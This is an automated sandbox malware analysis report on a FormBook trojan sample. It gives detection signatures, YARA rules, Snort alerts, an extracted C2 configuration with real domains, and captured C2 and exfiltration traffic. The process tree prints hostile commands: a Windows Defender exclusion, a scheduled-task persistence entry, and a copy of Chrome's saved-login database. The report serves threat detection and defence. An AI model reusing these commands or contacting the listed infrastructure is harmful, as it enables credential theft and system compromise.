Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iuvRyl9i7D

Overview

General Information

Sample Name:iuvRyl9i7D (renamed file extension from none to exe)
Analysis ID:626605
MD5:f7ecd12d134aaf3541396c78337ce672
SHA1:bb41a84d4f5eef537e41cf4bde375c99bff86a04
SHA256:ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
Tags:32exetrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • iuvRyl9i7D.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\iuvRyl9i7D.exe" MD5: F7ECD12D134AAF3541396C78337CE672)
    • powershell.exe (PID: 6568 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6640 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • iuvRyl9i7D.exe (PID: 6804 cmdline: C:\Users\user\Desktop\iuvRyl9i7D.exe MD5: F7ECD12D134AAF3541396C78337CE672)
    • iuvRyl9i7D.exe (PID: 6932 cmdline: C:\Users\user\Desktop\iuvRyl9i7D.exe MD5: F7ECD12D134AAF3541396C78337CE672)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6628 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3984 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries
      SourceRuleDescriptionAuthorStrings
      12.0.iuvRyl9i7D.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        12.0.iuvRyl9i7D.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        12.0.iuvRyl9i7D.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        12.0.iuvRyl9i7D.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          12.0.iuvRyl9i7D.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 21 entries
          No Sigma rule has matched
          Timestamp:192.168.2.435.209.127.15549776802031449 05/14/22-15:30:16.775228
          SID:2031449
          Source Port:49776
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.435.209.127.15549776802031453 05/14/22-15:30:16.775228
          SID:2031453
          Source Port:49776
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.435.209.127.15549776802031412 05/14/22-15:30:16.775228
          SID:2031412
          Source Port:49776
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
          Source: iuvRyl9i7D.exeVirustotal: Detection: 23%Perma Link
          Source: iuvRyl9i7D.exeReversingLabs: Detection: 19%
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.uspplongee.com/n6g4/Avira URL Cloud: Label: malware
          Source: http://www.properscooter.com/n6g4/Avira URL Cloud: Label: malware
          Source: http://www.kickball.site/n6g4/Avira URL Cloud: Label: phishing
          Source: http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHuAvira URL Cloud: Label: phishing
          Source: http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznVAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeReversingLabs: Detection: 19%
          Source: iuvRyl9i7D.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJoe Sandbox ML: detected
          Source: 12.0.iuvRyl9i7D.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 12.0.iuvRyl9i7D.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 12.0.iuvRyl9i7D.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 12.2.iuvRyl9i7D.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: iuvRyl9i7D.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: iuvRyl9i7D.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 38.34.163.59 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.209.127.155 80
          Source: C:\Windows\explorer.exeDomain query: www.properscooter.com
          Source: C:\Windows\explorer.exeDomain query: www.jamesreadtanusa.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.116.236 80
          Source: C:\Windows\explorer.exeDomain query: www.uspplongee.com
          Source: C:\Windows\explorer.exeDomain query: www.bldh45.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.183 80
          Source: C:\Windows\explorer.exeDomain query: www.dems-clicks.com
          Source: C:\Windows\explorer.exeDomain query: www.kickball.site
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.47.216 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
          Source: C:\Windows\explorer.exeDNS query: www.bldh45.xyz
          Source: Malware configuration extractorURLs: www.admincost.com/n6g4/
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
          Source: Joe Sandbox ViewASN Name: INTERXSCH INTERXSCH
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 53 58 72 56 73 48 69 39 4a 75 32 4d 32 55 77 35 5f 49 63 42 61 38 6d 54 53 32 6a 70 79 6b 54 68 4a 52 79 46 66 43 32 71 4f 7a 67 6a 73 69 6b 52 30 78 44 74 46 64 39 4c 67 61 67 73 56 4b 62 73 46 37 57 50 2d 43 65 35 70 63 6c 57 36 37 62 71 47 67 6d 42 4d 7a 54 48 76 45 4b 62 6e 6e 6a 76 44 62 6f 57 74 76 6d 47 76 70 59 66 67 49 43 32 43 39 2d 77 78 44 58 4d 71 6c 72 39 77 66 37 44 72 4d 4f 59 75 69 36 62 44 74 54 30 73 59 6e 37 4a 71 6b 53 72 6d 42 47 69 65 74 63 44 53 4f 6f 4f 31 33 52 77 76 64 72 43 56 4d 30 64 55 5f 35 56 32 70 77 46 71 64 69 57 39 66 49 45 73 42 39 30 76 4b 53 55 31 35 4b 54 72 7a 4c 47 66 33 77 65 45 56 37 4a 54 6e 44 78 6e 4c 73 45 4c 4a 61 70 33 49 41 64 46 4f 5a 5a 41 78 44 63 6b 79 77 56 69 43 56 58 6c 41 49 59 39 4c 52 66 62 47 43 43 45 5f 61 71 4c 62 71 5f 38 74 65 30 6e 57 49 45 68 37 28 44 6e 2d 62 77 28 61 30 6f 5a 4b 7e 73 41 6a 42 53 45 61 38 4f 33 47 7a 35 6d 69 4a 65 47 63 59 37 45 46 61 67 28 68 7e 37 31 30 37 79 65 4c 34 4d 79 33 62 39 68 74 54 68 57 54 54 4b 79 75 33 6d 62 78 70 5f 6c 4c 78 6a 4e 4c 76 55 4f 4f 37 69 34 46 74 77 68 43 44 69 4b 37 50 69 6a 78 38 72 73 46 49 6f 68 5a 36 66 48 4e 4d 4a 5a 2d 66 62 37 38 4c 6e 68 68 54 30 37 5f 41 66 41 56 32 64 35 31 77 56 55 44 35 6e 63 4a 66 35 66 61 35 65 46 4a 59 4e 4c 4b 74 6c 64 4d 28 72 53 6c 4d 39 75 41 48 55 50 48 70 59 30 4a 32 73 55 76 39 72 42 50 77 39 46 37 32 58 39 7a 55 37 38 59 76 38 4a 44 34 61 6b 45 42 67 6b 54 5a 32 64 55 4b 49 37 49 77 34 61 79 50 79 50 50 68 4e 65 69 52 4b 51 33 61 6f 4e 47 69 37 33 33 58 45 56 30 54 5a 33 4f 54 39 57 37 7a 4a 6e 31 67 77 49 4e 39 4b 41 4a 4a 72 79 46 7e 7a 47 74 4b 6b 76 61 76 54 56 35 75 42 4a 64 43 69 67 4d 77 4d 33 44 7e 57 6c 73 58 52 53 6d 70 